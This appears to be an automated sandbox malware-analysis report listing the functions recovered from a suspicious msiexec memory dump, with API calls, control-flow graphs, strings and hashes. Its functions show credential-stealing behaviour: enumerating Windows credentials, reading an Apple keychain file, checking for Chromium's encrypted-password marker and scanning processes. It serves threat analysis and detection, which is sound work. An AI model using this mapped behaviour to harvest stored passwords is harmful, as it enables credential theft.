                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                        • API String ID: 708747863-3398334509
                                                                                                        • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                        • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                        Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 649 413e79-413e9d call 413959 call 413ca4 643->649 650 413e28-413e35 643->650 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 651 413edb-413ee2 646->651 647->651 663 413ea2-413eae CloseHandle 649->663 654 413e61-413e68 650->654 655 413e37-413e44 GetModuleHandleW 650->655 656 413ee4 651->656 657 413ee7-413efe 651->657 654->649 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->649 663->642
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                        • memset.MSVCRT ref: 00413D7F
                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                        • memset.MSVCRT ref: 00413E07
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                        • free.MSVCRT ref: 00413EC1
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                        • API String ID: 1344430650-1740548384
                                                                                                        • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                        • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                        Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 3473537107-0
                                                                                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                        Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                        • free.MSVCRT ref: 00418803
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1355100292-0
                                                                                                        • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                        • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                        Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$FirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 1690352074-0
                                                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                        Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041898C
                                                                                                        • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystemmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3558857096-0
                                                                                                        • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                        • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                        Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 73 445685 21->73 74 4456b2-4456b5 call 40b1ab 21->74 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 78 445fae-445fb2 63->78 79 445d2b-445d3b 63->79 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 87 445884-44589d call 40a9b5 call 4087b3 68->87 249 445c77 69->249 70->69 88 445ba2-445bcf call 4099c6 call 445403 call 445389 70->88 142 445849 71->142 90 44568b-4456a4 call 40a9b5 call 4087b3 73->90 108 4456ba-4456c4 74->108 95 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 79->95 96 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 79->96 146 44589f 87->146 88->54 148 4456a9-4456b0 90->148 165 445d67-445d6c 95->165 166 445d71-445d83 call 445093 95->166 196 445e17 96->196 197 445e1e-445e25 96->197 122 4457f9 108->122 123 4456ca-4456d3 call 413cfa call 413d4c 108->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->67 148->74 148->90 154->108 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->78 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->78 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->78 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->207 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->207 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004455C2
                                                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                                                        • memset.MSVCRT ref: 0044570D
                                                                                                        • memset.MSVCRT ref: 00445725
                                                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                          • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                          • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                        • memset.MSVCRT ref: 0044573D
                                                                                                        • memset.MSVCRT ref: 00445755
                                                                                                        • memset.MSVCRT ref: 004458CB
                                                                                                        • memset.MSVCRT ref: 004458E3
                                                                                                        • memset.MSVCRT ref: 0044596E
                                                                                                        • memset.MSVCRT ref: 00445A10
                                                                                                        • memset.MSVCRT ref: 00445A28
                                                                                                        • memset.MSVCRT ref: 00445AC6
                                                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                        • memset.MSVCRT ref: 00445B52
                                                                                                        • memset.MSVCRT ref: 00445B6A
                                                                                                        • memset.MSVCRT ref: 00445C9B
                                                                                                        • memset.MSVCRT ref: 00445CB3
                                                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                        • memset.MSVCRT ref: 00445B82
                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                        • memset.MSVCRT ref: 00445986
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                        • API String ID: 2263259095-3798722523
                                                                                                        • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                        • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                        Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                                        • API String ID: 2744995895-28296030
                                                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                        Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040B71C
                                                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • memset.MSVCRT ref: 0040B756
                                                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                        • memset.MSVCRT ref: 0040B851
                                                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • memset.MSVCRT ref: 0040BB53
                                                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                        • String ID: chp$v10
                                                                                                        • API String ID: 4290143792-2783969131
                                                                                                        • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                        • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                        Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                        • free.MSVCRT ref: 0040E49A
                                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                        • memset.MSVCRT ref: 0040E380
                                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                        • API String ID: 3849927982-2252543386
                                                                                                        • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
